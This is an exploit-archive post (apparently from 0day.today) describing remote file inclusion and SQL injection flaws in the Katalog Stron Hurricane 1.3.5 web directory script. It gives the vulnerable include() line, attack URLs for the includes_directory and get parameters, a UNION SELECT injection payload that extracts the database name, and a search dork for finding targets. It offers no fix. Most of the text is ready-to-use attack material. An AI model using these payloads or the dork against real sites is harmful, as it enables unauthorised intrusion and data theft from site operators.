Katalog Stron Hurricane Multiple Vulnerability RFI / SQL

2010-02-14T00:00:00
ID 1337DAY-ID-10903
Type zdt
Reporter kaMtiEz
Modified 2010-02-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Katalog Stron Hurricane Multiple Vulnerability RFI / SQL
========================================================

[ Software Information ]
 
[+] Vendor : http://www.katalog.hurricane.pl/
[+] Download : http://www.katalog.hurricane.pl/download.html
[+] version : 1.3.5 or lower maybe also affected
[+] Vulnerability : RFI
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Here We go .. Live From Jogja City.. ]
 
[ RFI ]
 
http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDONESIANCODER]
 
 
[ BUG ]
 
[!] moderation.php
     include($includes_directory.'population.php');
 
[ SQL ]
 
http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER]
 
[ XPL ]
 
6666+union+all+select+1,database(),3--
 
[ FIX ]
 
dunno :">
 
 
#############################################################################################################



#  0day.today [2018-01-04]  #